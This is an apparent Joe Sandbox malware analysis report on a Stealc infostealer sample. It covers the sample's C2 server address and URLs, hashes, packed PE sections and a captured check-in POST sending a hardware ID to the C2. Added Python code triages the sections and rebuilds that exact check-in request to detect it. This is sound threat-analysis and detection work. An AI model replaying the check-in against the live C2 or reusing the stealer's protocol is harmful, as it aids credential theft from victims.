http://185.215.113.206/ | true | | unknown

URLs from memory and binary strings (Name | Source | Malicious | Antivirus Detection | Reputation)
http://185.215.113.206/6c4adf523b719729.php-S | file.exe, 00000000.00000002.1753243458.00000000018E5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php. | file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/ws | file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpQS | file.exe, 00000000.00000002.1753243458.00000000018E5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/$ | file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1704510962.000000000563B000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.206
                                  unknownPortugal
                                  206894WHOLESALECONNECTIONSNLtrue
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1543417
                                  Start date and time:2024-10-27 20:14:11 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 27s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:1
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 129
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe
                                  No simulations
IPs
Match: 185.215.113.206
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
wo4POc0NG1.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.206/
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/
file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
Domains: No context
ASNs
Match: WHOLESALECONNECTIONSNL
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
wo4POc0NG1.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.16
r9gBM4l6Ip.exe | malicious | Amadey | 185.215.113.43
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.16
file.exe | malicious | Stealc, Vidar | 185.215.113.206
file.exe | malicious | LummaC | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.206
0j6nSbUQQS.dll | malicious | Amadey | 185.215.113.217
file.exe | malicious | LummaC | 185.215.113.16
JA3 fingerprints: No context
Dropped files: No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.957581879098783
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:2'151'424 bytes
                                  MD5:87f5c5f97ee636b82e53d3f3acb6ed2b
                                  SHA1:3aeeb3e7a4ca578ffbbe685c88ae689f141ee68d
                                  SHA256:0de3e0a7d01986ca6a969204c0dfb41fc50e24c992694ee629508e913643246c
                                  SHA512:abfbc8b048f3dca7eb88a5c3f3df76de83244fdacb93870ccf7931947f60b5efa2587c85a92199415c373b32fb0a289b9cdefa511983e2f3724758cec51a15ab
                                  SSDEEP:49152:QWR6WOM93YclfVB2lLn7+HeNzhe1YjN+WFpL3WtT7kYdzSOwl:RqcfLeH+HeRtN+6asYRv
                                  TLSH:36A533AB19DB909DCC9E8A7C9DC355AFF4F7BB596DD80842AC496D3024728A5CCDC20C
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                  Icon Hash:90cececece8e8eb0
                                  Entrypoint:0xb38000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entry point in .taggant; after the initial jmp the listed bytes are mostly zeros, which the disassembler renders as add byte ptr [eax], al):
                                  jmp 00007F0640EDEB6Ah
                                  lss esp, dword ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dh
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add al, 00h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], cl
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add al, 0Ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319
Data directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x2e7000 | 0x67600 | 63be2e53f80867f1448abb19dc233e41 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x2ea000 | 0x2aa000 | 0x200 | eb16b173399a1140e88df82f4a2ed475 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pbjioyes | 0x594000 | 0x1a3000 | 0x1a2400 | 3b1b42b291c45e2e370950eaac0f5906 | False | 0.9948463417139869 | data | 7.95363539760933 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xrzszivt | 0x737000 | 0x1000 | 0x400 | 5aaf905d516c3f35e6b8a4a496ddb086 | False | 0.7509765625 | data | 5.931086746101504 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x738000 | 0x3000 | 0x2200 | cf4597ac053a9b3bbe5bd2b23b7b63a2 | False | 0.06135110294117647 | DOS executable (COM) | 0.7853712716311377 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Imports
DLL | Import
kernel32.dll | lstrcpy
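The section table above is what the static-triage signatures on this sample key on: an entry point in .taggant rather than .text, two unnamed sections, two random-name sections, every executable section also writable, a 0x2e7000-byte region backed by 0x67600 bytes on disk and another 0x2aa000-byte region backed by 0x200 bytes, and a 7.95-entropy payload section. As an added example (my own code, not the report's or Joe Sandbox's), the Python below encodes that table and the reported entry point and applies those checks. The section alignment of 0x1000 is assumed (the page does not print it, but every section RVA is 0x1000-aligned), the name whitelist and thresholds are my own, and the entry point is converted from the VA the report prints to an RVA.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Section characteristic bits from winnt.h.
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RWX = RW | IMAGE_SCN_MEM_EXECUTE

# Names a plain MSVC-linked binary carries (my whitelist); anything else is worth a look.
STANDARD_NAMES = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                  ".reloc", ".bss", ".tls", ".pdata", ".CRT"}
SECTION_ALIGNMENT = 0x1000  # assumed; every RVA in the table is 0x1000-aligned


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int             # RVA
    virtual_size: int
    raw_size: int
    characteristics: int
    entropy: Optional[float] = None  # None where the report prints "unknown"


# The section table of file.exe exactly as printed in this report (entropy rounded).
FILE_EXE_SECTIONS = [
    Section("", 0x1000, 0x2e7000, 0x67600, IMAGE_SCN_CNT_INITIALIZED_DATA | RWX),
    Section(".rsrc", 0x2e8000, 0x1000, 0x0, IMAGE_SCN_CNT_INITIALIZED_DATA | RW, 0.0),
    Section(".idata", 0x2e9000, 0x1000, 0x200, IMAGE_SCN_CNT_INITIALIZED_DATA | RW, 0.8946),
    Section("", 0x2ea000, 0x2aa000, 0x200, IMAGE_SCN_CNT_INITIALIZED_DATA | RWX),
    Section("pbjioyes", 0x594000, 0x1a3000, 0x1a2400, IMAGE_SCN_CNT_INITIALIZED_DATA | RWX, 7.9536),
    Section("xrzszivt", 0x737000, 0x1000, 0x400, IMAGE_SCN_CNT_INITIALIZED_DATA | RWX, 5.9311),
    Section(".taggant", 0x738000, 0x3000, 0x2200, IMAGE_SCN_CNT_INITIALIZED_DATA | RWX, 0.7854),
]
IMAGE_BASE = 0x400000
ENTRY_POINT_VA = 0xb38000  # the report prints the entry point as a VA, not an RVA
ENTRY_POINT_RVA = ENTRY_POINT_VA - IMAGE_BASE


def section_for_rva(sections: List[Section], rva: int) -> Optional[Section]:
    """Return the section whose virtual range contains `rva`, or None."""
    for s in sections:
        if s.virtual_address <= rva < s.virtual_address + s.virtual_size:
            return s
    return None


def triage_sections(sections: List[Section], entry_rva: int,
                    high_entropy: float = 7.5, inflate_ratio: int = 4) -> List[Tuple[str, str]]:
    """Apply packer/unpacker heuristics and return (finding, section name) pairs."""
    findings = []
    ep = section_for_rva(sections, entry_rva)
    if ep is None:
        findings.append(("entry point outside every section", ""))
    elif ep.name not in STANDARD_NAMES:
        findings.append(("entry point in non-standard section", ep.name))
    for s in sections:
        if s.characteristics & RWX == RWX:
            findings.append(("writable and executable section", s.name))
        if s.name not in STANDARD_NAMES:
            findings.append(("non-standard section name", s.name))
        # Compare against the raw size rounded up to the section alignment so a
        # normal 0x200-byte .idata padded out to 0x1000 is not mistaken for a stub.
        if s.virtual_size > inflate_ratio * max(s.raw_size, SECTION_ALIGNMENT):
            findings.append(("virtual size far larger than raw size (filled at runtime)", s.name))
        if s.entropy is not None and s.entropy >= high_entropy:
            findings.append(("high-entropy section (compressed or encrypted payload)", s.name))
    return findings


if __name__ == "__main__":
    for finding, name in triage_sections(FILE_EXE_SECTIONS, ENTRY_POINT_RVA):
        print(f"{finding}: {name or '(unnamed)'}")
```

Run against the table it reports 14 findings: the entry point in .taggant, five RWX sections, five non-standard names, the two unnamed regions that are far larger in memory than on disk (the regions the packer fills before control reaches the real code), and the high-entropy pbjioyes section. The .rsrc and .idata sections produce nothing, and the import directory RVA 0x2e9050 from the directory table resolves to .idata, as the report says. Whether .taggant is the IEEE Taggant System marker that some commercial protectors append is not stated on the page.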
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-27T20:15:10.393892+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 20:15:08.153490067 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 20:15:08.159145117 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 20:15:08.159264088 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 20:15:08.159451962 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 20:15:08.164764881 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 20:15:10.098999023 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 20:15:10.099236012 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 20:15:10.100213051 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 20:15:10.100295067 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 20:15:10.100501060 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 20:15:10.100599051 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 20:15:10.100902081 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 20:15:10.100970030 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 20:15:10.103249073 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 20:15:10.108639002 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 20:15:10.393790960 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 20:15:10.393892050 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 20:15:12.764826059 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                                  • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | 6316 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 20:15:08.159451962 CET | 90 | OUT | GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Oct 27, 2024 20:15:10.098999023 CET | 203 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 19:15:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 27, 2024 20:15:10.100213051 CET | 203 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 19:15:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 27, 2024 20:15:10.100501060 CET | 203 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 19:15:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 27, 2024 20:15:10.100902081 CET | 203 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 19:15:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 27, 2024 20:15:10.103249073 CET | 413 | OUT | POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAK
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 42 45 39 32 42 44 32 46 43 45 32 39 31 34 36 34 38 33 37 34 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 2d 2d 0d 0a
Data Ascii (CRLFs rendered as line breaks):
------HCFIIIJJKJKFHIDGDBAK
Content-Disposition: form-data; name="hwid"

8BBE92BD2FCE2914648374
------HCFIIIJJKJKFHIDGDBAK
Content-Disposition: form-data; name="build"

tale
------HCFIIIJJKJKFHIDGDBAK--
Oct 27, 2024 20:15:10.393790960 CET | 210 | IN | HTTP/1.1 200 OK
Date: Sun, 27 Oct 2024 19:15:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 for "block")
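The exchange above is the Stealc check-in the Suricata signature fired on: a bare GET / probe, then a multipart POST carrying a victim identifier (hwid) and the build tag (tale) to /6c4adf523b719729.php, answered with a base64 string. As an added example that is not part of this report and not the malware's or Joe Sandbox's code, the Python below rebuilds the captured POST byte-for-byte from the values shown on the page (boundary, hwid, build, header order), parses it back out, applies a detection test of my own devising (a multipart POST whose only parts are hwid and build; the text of ET rule 2044243 is not reproduced on this page, so this is an approximation of its intent, not its content), and decodes the reply. Everything embedded is taken from the capture; the benign upload used as a negative test is constructed.

```python
import base64
import re
from typing import Dict, Optional, Tuple

# Values copied from the check-in captured in this report.
C2_HOST = "185.215.113.206"
C2_PATH = "/6c4adf523b719729.php"
BOUNDARY = b"----HCFIIIJJKJKFHIDGDBAK"
CAPTURED_HWID = b"8BBE92BD2FCE2914648374"
CAPTURED_BUILD = b"tale"
CAPTURED_REPLY = b"YmxvY2s="


def build_checkin_body(hwid: bytes, build: bytes, boundary: bytes = BOUNDARY) -> bytes:
    """Rebuild the multipart/form-data body: an `hwid` part, then a `build` part."""
    parts = []
    for name, value in ((b"hwid", hwid), (b"build", build)):
        parts.append(b"--" + boundary + b"\r\n"
                     + b'Content-Disposition: form-data; name="' + name + b'"\r\n\r\n'
                     + value + b"\r\n")
    return b"".join(parts) + b"--" + boundary + b"--\r\n"


def build_checkin_request(hwid: bytes, build: bytes, boundary: bytes = BOUNDARY) -> bytes:
    """Rebuild the full POST with the header order seen in the capture."""
    body = build_checkin_body(hwid, build, boundary)
    return (b"POST " + C2_PATH.encode() + b" HTTP/1.1\r\n"
            + b"Content-Type: multipart/form-data; boundary=" + boundary + b"\r\n"
            + b"Host: " + C2_HOST.encode() + b"\r\n"
            + b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            + b"Connection: Keep-Alive\r\n"
            + b"Cache-Control: no-cache\r\n\r\n"
            + body)


_PART_NAME = re.compile(rb';\s*name="([^"]*)"')   # "; name=", not "filename="
_BOUNDARY = re.compile(r"boundary=([^;\s]+)")


def parse_multipart(body: bytes, boundary: bytes) -> Dict[str, str]:
    """Map part names to their text values; stops at the closing `--boundary--`."""
    fields = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):
            break
        head, _, value = chunk.partition(b"\r\n\r\n")
        m = _PART_NAME.search(head)
        if m:
            fields[m.group(1).decode("latin-1")] = value.rstrip(b"\r\n").decode("latin-1")
    return fields


def parse_http_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def stealc_checkin_fields(raw: bytes) -> Optional[Dict[str, str]]:
    """Return the form fields if `raw` has the shape of the captured check-in
    (a multipart POST whose only parts are `hwid` and `build`), else None."""
    method, _, headers, body = parse_http_request(raw)
    ctype = headers.get("content-type", "")
    m = _BOUNDARY.search(ctype)
    if method != "POST" or not ctype.startswith("multipart/form-data") or not m:
        return None
    fields = parse_multipart(body, m.group(1).encode("latin-1"))
    return fields if set(fields) == {"hwid", "build"} else None


def decode_c2_reply(body: bytes) -> bytes:
    """The server answers in base64; the captured `YmxvY2s=` decodes to `block`."""
    return base64.b64decode(body)


if __name__ == "__main__":
    request = build_checkin_request(CAPTURED_HWID, CAPTURED_BUILD)
    print(len(request), stealc_checkin_fields(request), decode_c2_reply(CAPTURED_REPLY))
```

Rebuilt from the page's values the body is 211 bytes and the whole request 413, matching the Content-Length and the "Bytes transferred" column, which is a useful check that nothing in the capture was elided. The reply decodes to "block"; the page does not say how the sample interprets it, but no request follows it in the capture and the analysis ended with all processes terminated, which is consistent with the C2 declining to serve this client.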



                                  Target ID:0
                                  Start time:15:15:03
                                  Start date:27/10/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0xbd0000
                                  File size:2'151'424 bytes
                                  MD5 hash:87F5C5F97EE636B82E53D3F3ACB6ED2B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1704510962.0000000005610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:3.2%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:3.5%
                                    Total number of Nodes:1327
                                    Total number of Limit Nodes:24
